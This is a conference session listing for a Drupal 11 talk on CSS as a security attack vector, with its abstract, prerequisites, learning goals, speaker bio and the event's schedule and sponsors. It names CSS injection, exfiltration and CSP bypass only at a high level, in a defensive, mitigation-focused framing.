Stylish, yet vulnerable: CSS and security in Drupal 11

Amphi "Bleu de Sassenage" Expertise Jeudi 14:45 - 15:25 (09/04/2026)

Warning: this session will be held from 15:10 to 15:30 (shared slot)

CSS is usually treated as “just styling.” However, documented security research shows that it can be leveraged as an attack vector under certain conditions. From CSS injection and data exfiltration techniques using attribute selectors and external resource loading, to the historical :visited history leak and CSP bypass scenarios, CSS has a non-trivial security footprint.

In Drupal 11, these risks intersect with real-world features:

  • Custom CSS capabilities (themes, contrib modules, layout tools)
  • CKEditor 5 and text format permissions
  • Asset libraries defined in *.libraries.yml
  • Content Security Policy configuration
  • Role and permission management

This session will break down realistic attack scenarios involving CSS in a Drupal environment, explain why they work, and outline concrete mitigation strategies. The goal is not fear, but clarity: understanding where the risks truly lie and how to address them responsibly.

Durée de la conférence
20 min
Pré-requis (concepts ou connaissances particulières à connaître)

Required

  • Basic understanding of how CSS works (selectors, properties, external stylesheets)
  • General familiarity with Drupal site building concepts (themes, modules, permissions)
  • Awareness of common web security terms (e.g., XSS, CSP, injection), even at a high level

No deep security expertise is required.

Recommended (Helpful but Not Mandatory)

  • Experience working with Drupal themes or *.libraries.yml
  • Basic understanding of Content Security Policy (CSP)
  • Familiarity with Drupal text formats and role permissions
  • Some frontend development experience
Ce que le public aura appris après avoir assisté à cette conférence

By the end of this session, attendees will:

  • Understand how CSS can be used as an attack vector
  • Recognize realistic CSS-related risks in Drupal 11
  • Identify misconfigurations that increase exposure
  • Apply concrete mitigation strategies
  • Improve collaboration between frontend, backend, and security teams
  • Leave with a practical hardening checklist for real-world projects
Langue de présentation
English

Présenté par

Profile picture for user Nicoloye

Nicoloye

CTO at Smile

Grenoble, France

Nicolas is an active member of the French Drupal Association. He has joined the community in 2006 and is a Drupal enthusiast since then. He has participated in several community projects and initiatives. He is Chief Technology Officer at Smile. When he is not coding he likes any kind of game (board, card, tabletop roleplaying, etc) and spending some time with his cat.

Autres sessions au même moment

Drupal et MCP : Modélisez et connectez vos contenus par l'IA

Amphi "Gratin Dauphinois" | by Guillaume

Dompter le Refactoring

Amphi "Tarte aux noix" | by nerea

Deploying more than 60 Drupal Websites for the French Ecological Transition Ministry (MTE) : innovation at scale over an 8-year period

Amphi "Bleu de Sassenage" | by Audrey VL, Amphi "Bleu de Sassenage" | by Sylvain Moreau

Sponsors Belledonne

logo ecedi

Sponsors Vercors

Logo Axess
Logo baksla.sh
Logo Bluedrop
Logo Code Enigma
Logo Koriolis
Logo Makina Corpus
Logo Sully